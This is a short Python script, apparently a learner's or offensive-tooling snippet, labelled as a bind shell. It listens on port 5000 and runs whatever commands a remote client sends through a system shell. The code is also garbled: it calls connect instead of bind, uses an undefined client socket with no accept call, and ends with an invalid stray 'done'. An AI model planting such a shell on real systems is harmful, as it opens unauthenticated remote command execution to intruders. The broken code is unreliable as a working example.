#!/usr/bin/python

# Write a bind shell
import socket
import subprocess

host = '0.0.0.0'
port = 5000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# This is for reusing the port
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)


s.connect( (host,port) ) #single arg which is tuple

# Listen for single connection
s.listen(1)

while 1:
   cmd = client_socket.recv(1024)
   client_socket.send(str(subprocess.call(cmd, stdout=client_socket, shell=True)))
   
done
s.close()
